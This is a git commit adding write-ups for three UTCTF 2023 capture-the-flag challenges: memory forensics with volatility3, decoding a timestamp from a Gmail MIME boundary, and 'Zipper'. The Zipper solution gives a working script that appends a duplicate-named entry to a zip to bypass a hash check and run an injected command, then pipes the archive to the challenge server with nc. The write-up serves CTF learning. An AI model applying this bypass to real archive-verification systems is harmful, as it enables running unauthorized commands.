Add utctf-23 writeups

aenniw · Oct 3, 2023 · 2ca6c39 · 2ca6c39
1 parent 3cd6923
commit 2ca6c39
Show file tree

Hide file tree

Showing 3 changed files with 55 additions and 3 deletions.
diff --git a/utctf-2023/Easy_Volatility/README.md b/utctf-2023/Easy_Volatility/README.md
@@ -4,8 +4,8 @@ I've included the flag in as shell command. Can you retrieve it?
 
 I recommend using the [volatility3](https://github.com/volatilityfoundation/volatility3) software for this challenge.
 
-Here is the memory dump: [debian11.core.zst](https://utexas.box.com/s/fehluzyox4bbgfjlz061r2k7k2sek3cw)  
-This problem also comes with a free profile! [debian11_5.10.0-21.json.zst](https://utexas.box.com/s/g64kezqvkqhm6nw79oovcekn9z1w66q0)  
+Here is the memory dump: [debian11.core.zst](https://utexas.box.com/s/fehluzyox4bbgfjlz061r2k7k2sek3cw)
+This problem also comes with a free profile! [debian11_5.10.0-21.json.zst](https://utexas.box.com/s/g64kezqvkqhm6nw79oovcekn9z1w66q0)
 Both of these files are compressed using `zstd`.
 
 This challenge's flag looks like a UUID.
@@ -18,7 +18,15 @@ By Daniel Parks (@danielp on discord)
 
 #### Solution:
 
+Pretty standard volatility challenge, but you have to use `volatility3` and put the symbols to its place before running the `linux.bash.Bash` module. The flag is the single bash command present.
+
 ```bash
+git clone https://github.com/volatilityfoundation/volatility3.git
+unzstd ./debian11.core.zst
+unzstd ./debian11_5.10.0-21.json.zst
+cp ./debian11_5.10.0-21.json ./volatility3/volatility3/symbols
+python3 ./volatility3/vol.py isfinfo
+python3 ./volatility3/vol.py -f ./debian11.core linux.bash.Bash
 ```
 
 ---

diff --git a/utctf-2023/What_Time_is_It/README.md b/utctf-2023/What_Time_is_It/README.md
@@ -8,7 +8,32 @@ By Aadhithya (@aadhi0319 on Discord) [phishing.eml](./phishing.eml ":ignore")
 
 #### Solution:
 
-```bash
+I solved this challenge by extracting the timestamp from Gmail MIME Boundary Delimiters` according to [this article](https://www.metaspike.com/gmail-mime-boundary-delimiter-timestamps/).
+
+```python
+import datetime
+import pytz
+
+gmail_mime_boundary = "00000000000093882205f60cdcdb"
+output_timezone = "UTC"
+
+hex_val = gmail_mime_boundary[19:26]+gmail_mime_boundary[12:18]
+timestamp_microseconds = int("0x"+hex_val, 16)
+timestamp_seconds = timestamp_microseconds/1000000
+
+tz_UTC = pytz.timezone('UTC')
+datetime_obj_utc = datetime.datetime.fromtimestamp(timestamp_seconds, tz=tz_UTC)
+
+print("Timestamp in UTC:")
+print(datetime_obj_utc.isoformat())
+print(datetime_obj_utc.strftime("%m/%d/%Y-%H:%M"))
+print()
+
+print(f"Timestamp in timezone {output_timezone}:")
+datetime_obj_timezone = datetime_obj_utc.astimezone(pytz.timezone(output_timezone))
+print(datetime_obj_timezone.isoformat())
+print(datetime_obj_timezone.strftime("%m/%d/%Y-%H:%M"))
+print()
 ```
 
 ---

diff --git a/utctf-2023/Zipper/README.md b/utctf-2023/Zipper/README.md
@@ -16,7 +16,26 @@ By Aadhithya (@aadhi0319 on discord) [commands.zip.b64](./commands.zip.b64 ":ign
 
 #### Solution:
 
+We see that the [verify_hash.py](./verify_hash.py ":ignore") script uses `get_file("commands/command.txt", archive)` to get the file that is checked for the hash, but then runs `archive.extractall()` before running it. In `ZIP` there is a possibility to create multiple files with same name, so after extracting all the files, our injected second file will overwrite the original one and run our evil bash payload. Here's the python script to construct such `ZIP`:
+
+```python
+import zipfile
+import os
+
+os.system('cat commands.zip.b64| base64 -d > commands_orig.zip')
+os.system('cp commands_orig.zip commands.zip')
+
+f = open("command_evil.txt", "w")
+f.write("cat flag.txt")
+f.close()
+
+zip = zipfile.ZipFile('commands.zip','a')
+zip.write('command_evil.txt', 'commands/command.txt')
+zip.close()
+```
+
 ```bash
+python3 zipper.py; cat commands.zip | base64 -w 0 | sed 's/$/\n/' | nc betta.utctf.live 12748
 ```
 
 ---